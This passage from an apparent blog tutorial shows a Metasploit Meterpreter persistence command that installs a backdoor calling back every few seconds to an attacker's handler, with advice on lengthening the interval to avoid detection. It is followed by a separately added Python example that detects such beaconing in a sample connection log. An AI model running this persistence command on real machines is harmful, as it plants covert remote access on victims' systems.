<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi-BcGHpXqHA5mzKQ2bM23TjzZDSODgYAOAcdLX-dEwE1K2yciz0DFsuFFyddjFYWEDT_XlFNHD2FiGCdQyGnXkVNqVSYfORFRjXdFCpMyc_tUQUAtuO0_pS9zY2Jr1skkD5tTQjkcCn1V/s1600/msfconsole-script-persistence-help.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="441" data-original-width="944" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi-BcGHpXqHA5mzKQ2bM23TjzZDSODgYAOAcdLX-dEwE1K2yciz0DFsuFFyddjFYWEDT_XlFNHD2FiGCdQyGnXkVNqVSYfORFRjXdFCpMyc_tUQUAtuO0_pS9zY2Jr1skkD5tTQjkcCn1V/s640/msfconsole-script-persistence-help.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
So, seeing this, our command will be:<br />
<blockquote class="tr_bq">
<b style="background-color: black;"><span style="color: white;">run persistence -U -i 5 -p 4444 -r 192.168.1.36</span></b></blockquote>
<br />
That is, every time the victim starts a session, the backdoor will try to open a connection to 192.168.1.36:4444 every 5 seconds. The interval depends on what the attacker wants: a small interval is more likely to be detected, so if you want it a bit more stealthy, maybe 5 min is fine.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5GwR36jDpZSLrDWEo6P2uNh8fhOwDC1_G6HfDMqCfsgL5S3jRDcaJbwkwvXg5bkxoWtaHCUIU0ZXKDmjG3Xh855AMkDmxnTn3P7U57ZeWx-VIycCKdJQ_Pl87NITOyOu14bQICEbo-fqF/s1600/msfconsole-script-persistence-launched.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="325" data-original-width="943" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5GwR36jDpZSLrDWEo6P2uNh8fhOwDC1_G6HfDMqCfsgL5S3jRDcaJbwkwvXg5bkxoWtaHCUIU0ZXKDmjG3Xh855AMkDmxnTn3P7U57ZeWx-VIycCKdJQ_Pl87NITOyOu14bQICEbo-fqF/s640/msfconsole-script-persistence-launched.png" width="640" /></a></div>
<br />
<br />
Cheers, use this responsibly<br />
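The detectability the post mentions is exactly what beaconing analytics key on: a fixed reconnect interval produces inter-arrival times with almost no variance. The following added example, not part of this post or of Metasploit, runs that check over a constructed connection log in which one host calls back to 192.168.1.36:4444 every 5 seconds (the <code>-i 5 -p 4444 -r 192.168.1.36</code> values above) amid ordinary irregular HTTPS traffic; the client address is made up.

```python
"""Flag beaconing: repeated connections to one destination at a near-constant interval.

Added example, not part of the original post. Input is a constructed, simplified
connection log (timestamp src dst dst_port); in practice the same check runs over
firewall, NetFlow or Zeek conn records.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample: a callback every 5 s to 192.168.1.36:4444, the interval and
# handler from "run persistence -U -i 5 -p 4444 -r 192.168.1.36", mixed with ordinary
# irregular HTTPS traffic from the same host. The client address 192.168.1.50 is made up.
SAMPLE_LOG = """\
2019-12-04T02:02:00 192.168.1.50 192.168.1.36 4444
2019-12-04T02:02:01 192.168.1.50 10.0.0.5 443
2019-12-04T02:02:05 192.168.1.50 192.168.1.36 4444
2019-12-04T02:02:09 192.168.1.50 10.0.0.5 443
2019-12-04T02:02:10 192.168.1.50 192.168.1.36 4444
2019-12-04T02:02:15 192.168.1.50 192.168.1.36 4444
2019-12-04T02:02:16 192.168.1.50 10.0.0.5 443
2019-12-04T02:02:20 192.168.1.50 192.168.1.36 4444
2019-12-04T02:02:31 192.168.1.50 10.0.0.5 443
2019-12-04T02:02:25 192.168.1.50 192.168.1.36 4444
"""


def parse_log(text):
    """Group connection timestamps by (src, dst, dst_port)."""
    series = defaultdict(list)
    for line in text.splitlines():
        if line.strip():
            ts, src, dst, dport = line.split()
            series[(src, dst, int(dport))].append(datetime.fromisoformat(ts))
    return series


def find_beacons(text, min_events=4, max_cv=0.1):
    """Return {(src, dst, dst_port): mean_gap_seconds} for series whose inter-arrival
    times are nearly constant (coefficient of variation <= max_cv)."""
    beacons = {}
    for key, stamps in parse_log(text).items():
        if len(stamps) < min_events:
            continue
        stamps.sort()                                  # log lines need not arrive in order
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_cv:
            beacons[key] = avg
    return beacons


if __name__ == "__main__":
    for (src, dst, port), gap in find_beacons(SAMPLE_LOG).items():
        print(f"{src} -> {dst}:{port} reconnects every {gap:.1f} s")
```

A longer interval such as the 5 minutes suggested above only needs a longer observation window to surface the same way; jitter in the interval is what actually pushes the variance past <code>max_cv</code>.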
<hr /><b>Resurrection</b> (2019-12-03)<br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container tr_bq" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1O2gpu6nKY0j0I7GGR7mayylIYhqRlFGEfraPCN9rfUJV8AKOzpNrwakRq1sQa0XmOqS_BqzAP1tXPFGbWP9XThgR2460mB8kb92ec-6E8uPABKwt2bSYhPw3JJ4xoZGpc4s7dIQrP18Y/s1600/resurrection.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img alt="Source: http://www.geekchicelite.com/interview-kevin-sizemore-resurrection/" border="0" data-original-height="900" data-original-width="1600" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1O2gpu6nKY0j0I7GGR7mayylIYhqRlFGEfraPCN9rfUJV8AKOzpNrwakRq1sQa0XmOqS_BqzAP1tXPFGbWP9XThgR2460mB8kb92ec-6E8uPABKwt2bSYhPw3JJ4xoZGpc4s7dIQrP18Y/s400/resurrection.jpg" title="Resurrection" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><br /></td></tr>
</tbody></table>
<hr />
<i>My old blog is not completely cleaned up; it may have had some important code which I am thinking of shifting to my GitHub :).</i><br />
<br />
<div style="text-align: center;">
<i>The new blog will be concentrating on improved technical analogies in a wide variety of subjects</i></div>